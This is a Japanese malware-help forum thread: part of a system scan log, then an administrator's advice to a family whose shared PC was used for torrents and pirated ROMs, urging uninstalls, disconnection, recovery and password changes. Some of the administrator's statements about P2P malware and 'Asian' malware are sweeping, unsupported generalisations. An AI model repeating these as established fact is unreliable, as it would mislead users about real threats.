SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >

こんばんは。
ここの管理人の悪代官です。

今回はどうもひっかかるようなところがあるので、よければ少し調べさせてもらっていいですか？
よければ以下の説明を読んでから、順番に確認と作業をお願いします。

まず下記アプリが旧バージョンのようなので、一度全部GUでアンインストールしてください。
>Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305

>ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0

>Lhaplus 2014/11/13

>Mozilla Firefox 37.0.1 (x86 ja) Mozilla 2015/04/04 83.5 MB 37.0.1

>>Skype(TM) 7.3 Skype Technologies S.A. 2015/04/04 49.4 MB 7.3.101
そのあと必要なアプリは公式サイトからダウンロード、再インストールしてください。
不要なものなら再インストもしなくていいです。

次に、下記は入れなおし不要と思うので、セーフモードでGUを使ってアンインストール推奨です。
>ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209

>Hounds DMM 2014/05/10 1.0.0

>KDrive kingsoft 2014/11/13 1.21.0.1584

>KDriveプラグイン kingsoft 2014/11/13 1.0.0.1

上記の確認と入れなおしできたら次に重要な確認です。

該当のPCはご家族共用ということですが、全ユーザー（ご家族）全員に正直にお訊ねします。
P2Pのような法的セキュリティ的に問題あるアプリや、海外（特に中国系等）の不審サイトやアップローダーサイトへのアクセスや、そこからダウンロードしたファイルがありますか？
各ログを見てもアジア系のおかしなエントリがいくつか見えてます。

それらを使用していたら、著作権等の法的上だけでも問題ある場合が発生しますが、それ以上にPC内への感染で猶予なくなっているおそれも大です。
ご家族全員がそれらのサイトやファイルにまった覚えがないならその恐れは杞憂でしょうからそのことだけ教えてください。

ですが本当に、信頼できないサイトやファイルに手を出したことが一度でもあったら、その内容を覚えている範囲で正直に教えてください。

ただでさえアジア系マルウェアは欧米系のマルウェアよりも解析処置が非常に困難です。
一度でも入り込まれたら時間かけて調べている間にも更に傷口広げてしまうことも少なくないので、安全優先の点ではその恐れが見えた時点でリカバリをお勧めすることもかなり多いです。

例として2012年12月にどこかからダウンロードしたmp3ファイルのエントリですが
>[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Ｋａｌｅｉｄｏｓｃｏｐｅ（ｔｒａｎｓｐａｒｅｎｔ　ｍｉｘ｜Ｂｏｎｕｓ　Ｔｒａｃｋ）.mp3
これも自分が見た限りではまともそうなファイルには見えません。
他にもおかしなエントリやファイルの痕跡もありますね。

家庭でも会社でも複数ユーザー共用のPCで、誰かひとりでも誤った使い方したら全ユーザーのデータが一連托生で危険にさらされ、ネット上にPC内の全データが漏えいされることも平気で起きます。
実際そういった被害例と相談もこの掲示板では幾度も受けました。
そしてそれらの症状が判明したら、とるべき対処はリカバリ一択でしたが、ただリカバリすればそれで解決ということでもありません。
一度ネット上に漏えいしたデータはもう回収は不可能です。
被害ユーザーのほうで過去のデータやパスワード等の個人情報を全部変更して、以後の再被害を防ぐための自衛もとらないと無意味です。

まずはご家族全員に確認と、そのお返事をレスください

レスが遅くなり申し訳ありません。
先にご忠告、進言ありがとうございます。
本題ですが

家族に聞いてみたところP2Pかどうかは判断できませんが(自分が疎い為)、不法にゲームのデータをいくつかDLしたとのことです。
自分が分かる範囲ですが、torentのファイルもあるようです。
どこでDLしたか聞いたところ英語ばかりのサイトだったとのことで、なにやらまとめサイトのようなもので案内を見てページにジャンプしたようです。
そこがどのようなサイトかは分かりません。俗に言うROMやエミュレーターをDLしていたみたいです。
確認したところここまでしか分かりませんでした。
これらのファイルはいくつかこちらでも発見できましたが、ただ削除するだけで大丈夫なのですか？
具体的な対処がわからないので指示が出るまでは置いておきます。
以上で自分が出来る今の精一杯です。

また、GUでのアンインストールと記載されていましたが自分にはGUがわからないのでこれも今は何もしていません。
不躾ですが教えて頂けませんか？
お願い致します。

レスが遅くなってごめんなさい。
確認してみてよかったです。

>家族に聞いてみたところP2Pかどうかは判断できませんが(自分が疎い為)、不法にゲームのデータをいくつかDLしたとのことです。
>自分が分かる範囲ですが、torentのファイルもあるようです。

>そこがどのようなサイトかは分かりません。俗に言うROMやエミュレーターをDLしていたみたいです

やはりP2Pのtorrentですね。
どこからどんなファイルを落としたかは置いとくとして、これで状況はかなり厳しいことがはっきりしました。
P2Pでやり取りされているファイルは大半が「トラップ」（罠）と思ってください。
本来は高価なアプリや有償でしか提供されないコンテンツを無料で入手できると謳うのは、それを餌になにがしかの対価を狙う囮だからです。

自分が以前から他の相談者さんに数えきれないほど案内していることですが、P2Pを介して感染するマルウェアは他種のマルウェアとりも【格段に】処置が困難なのが通例です。
そしてP2Pマルウェアに感染したことがわかったら、その時点で既に手遅れになっていたことも同様に多数あります。

P2Pマルウェアを作成配布する者は最初から金銭目的であることは少ないですが、被害ユーザーにとってはある意味ではそれ以上に深刻な被害を受けます。
一例として感染PCのデスクトップ画面とその操作状態をリアルタイムでネット上に中継（漏えい）させて、被害ユーザーの個人情報や通信内容も全部晒します。
更には感染に気付いたユーザーが必死でその駆除を図る操作も同様に中継するので、その漏えい画面を見た外部のネットユーザーからは笑いものにされる結果になるほどです。
そして駆除を模索していることに気付いた悪意の者は、被害ユーザーのその作業を阻害までしてきます。
P2Pによって外部からの保護を無効化されてしまったPCは、外部からの不正なアクセスに対してもノーガードとなるので、本来のPCユーザーの操作を受け付けないまま外部からのコントロールでいいようにされます。
大げさに見えると思うならそれも構いませんが、P2Pマルウェアの作成配布者は被害ユーザーが苦しんでもがく様を見てそれを楽しむことが最大の目的なので、一度感染したらそれを完全駆除する方法は作成者も考えていないことが多く、こうなると対処法としてはリカバリ一択しか残りません。

結論ですが、大至急LANケーブルを抜くなりしてネットから物理的に切断したうえで、全ユーザーの必要なデータをバックアップしたうえで、それが済み次第速やかにリカバリをお勧めします。
リカバリ後はすぐにセキュリティソフトやWindowsUpdate等も最新状態に更新したうえで、それができたら最新状態のセキュリティソフトで一度完全スキャンして、何も感染や異常が見つからなければセーフです。

そして次に、リカバリ前のPCで入力したことのある各種パスワード等は全部変更もしてください。
特にネットショッピングやネットバンキングしたことがあればその情報は最優先で変更必須です。
なお、P2Pや信頼できない経路で入手したファイル等は一切バックアップ不可です。
現在でもまだ残っているものが【ひとつでも】あればそれらは即時破棄してください。

家族全員共用のPCでP2P感染となると、被害を受けるのはひとりのユーザーだけに収まりません、
特にそのPCをいくらかでも仕事に使っているユーザーがいたら、その被害は更に致命的にまで拡大します。

まずは大至急ご家族全員にこのスレの内容を見てもらったうえで、すぐにバックアップからかかってください。

リカバリとパス変更までできたらそこでまたHJTとインストール情報ログと、CCでの各タブのログを取り直して、それらをリカバリ後の状態報告とともにレスください。
リカバリさえできればそれで解決ではありません。
そこでまだ残っているものがないかを確認して、リカバリ後でも残っている問題が見つかればそれを処置と、以後の再被害を防ぐための自衛も不可欠です。